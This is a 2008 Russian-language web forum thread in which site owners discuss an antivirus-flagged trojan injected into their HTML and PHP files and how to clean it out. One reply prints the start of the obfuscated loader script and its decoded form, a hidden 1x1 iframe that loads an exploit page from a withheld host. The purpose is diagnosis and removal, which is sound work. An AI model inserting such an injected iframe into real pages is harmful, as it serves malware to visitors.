вирус на сайте

Тема в разделе "PHP", создана пользователем ivashka, 3 окт 2008.

Статус темы:
Закрыта.
Модераторы: latteo
  1. ivashka

    ivashka

    Регистр.:
    16 май 2007
    Сообщения:
    151
    Симпатии:
    15
    здраствуйте...
    есть у меня сайт Перейти по ссылке.
    все было вроде бы нормально, но как-то НОД32 стал ругаться на него, что на сайте троян...
    Что можно сделать?
    В упор его не вижу, и незнаю откуда он мог появится.
    Извините если не в тот раздел, просто не знал куда написать.
    Заранее благодарен.
     
  2. pslava

    pslava

    Регистр.:
    16 май 2007
    Сообщения:
    618
    Симпатии:
    122
    Смотри елси где-то iframe или ищи ява-скрипты, которых не должно быть (обычно что-то типа eval(...)), хотя нод не позволит тебе открыть зараженный файл, поэтому замени на хостере зараженый файл на исходный
     
  3. ewg777

    ewg777

    Регистр.:
    6 авг 2007
    Сообщения:
    763
    Симпатии:
    321
    1. Используй KIS.
    2. Не используй Total Commander для хранения ftp-данных. (Рекомендую CuteFTP)
    3. Запусти сам на серваке антивирь или обратись к support'у
    4. Trojan-Downloader.HTML.IFrame не так уж и страшно.
     
  4. Grifindore

    Grifindore

    Регистр.:
    4 сен 2007
    Сообщения:
    151
    Симпатии:
    35
    Я постоянно сталкиваюсь с данной проблемой на своих сайтах

    Делаю следющее:

    1.Открываю в редакторе с фтп все файлы .PHP .HTML .HTM. Все это значит и во вложенных дерикториях тоже.

    2. Смотрю в самый конец файла и вижу там очень длинную строчку :) - понять что это она можно сразу.

    3. Копирую ее и ставлю заменить на пустоту во всех файлах.

    4. Сохраняю все обратно на фтп

    5. Меняю пароль к фтп ОБЯЗАТЕЛЬНО! Иначе через день все придется делать заново.

    Вот и все.

    Вирусняк этот не портит сам файл, но он дописывает в конец свой ифрейм или еще чего, для того чтобы подсадить пользователю бота.
     
  5. Liver

    Liver

    Регистр.:
    24 сен 2008
    Сообщения:
    316
    Симпатии:
    91
    Такой хайд чтобы видел топикстартер. Другим оно не нужно. И смени пароли/пропатчь движок/поищи шеллы.


    А что его искать
    У тебя в исходном коде смотри яваскрипт, который начинается с <script>var source ="=jgsb

    вот это оно и есть. оно расшифровывыается на лету в
    Код:
    <localhost>
    
    <iframe src="http://нескажу_куда.com/spl/index.php"  width=1 height=1 style="display:none"></iframe>
    

    2ewg777

    Страшно. еще как страшно. Это потеря репутации у пользователей. У меня КИС вообще не дал открыть этот сайт. И нод вот не дает. А значит вообще никто не зайдет. Только линуксоиды.
     
  6. ewg777

    ewg777

    Регистр.:
    6 авг 2007
    Сообщения:
    763
    Симпатии:
    321
    Вообще-то DLE обновлять надо. Какая версия на сайте?
     
  7. PHP_Master

    PHP_Master

    Регистр.:
    3 фев 2008
    Сообщения:
    2.647
    Симпатии:
    591
    Что эта тема делает в разделе "Web Coding" ?
    Вообще этот вопрос подымался на форуме не раз, влом воспользоваться поиском?
    Есть топик точно с таким же названием (Перейти по ссылке), находится элементарно.
     
  8. xenitron

    xenitron Писатель

    Регистр.:
    23 июн 2008
    Сообщения:
    2
    Симпатии:
    0
    Пользовался хостингом на NET.RU, файлики *.html одно время заражались прямо на серваке! Чуть позже все нормализовалось, но пришлось в страничках зачищать вписанный iframe
     
  9. vave

    vave

    Регистр.:
    23 июн 2007
    Сообщения:
    374
    Симпатии:
    15
    хотел посмотреть страницу а на ней ошибка, и справляйтесь;)
     
  10. Faet0n

    Faet0n Создатель

    Регистр.:
    11 апр 2008
    Сообщения:
    15
    Симпатии:
    0
    Вопрос... Каким образом получается, что у этих вирусов есть возможность дописываться в файлы на сервере?
    Сам столкнулся на днях с этой проблемой, но полностью уверен что утечки не было...
     
Статус темы:
Закрыта.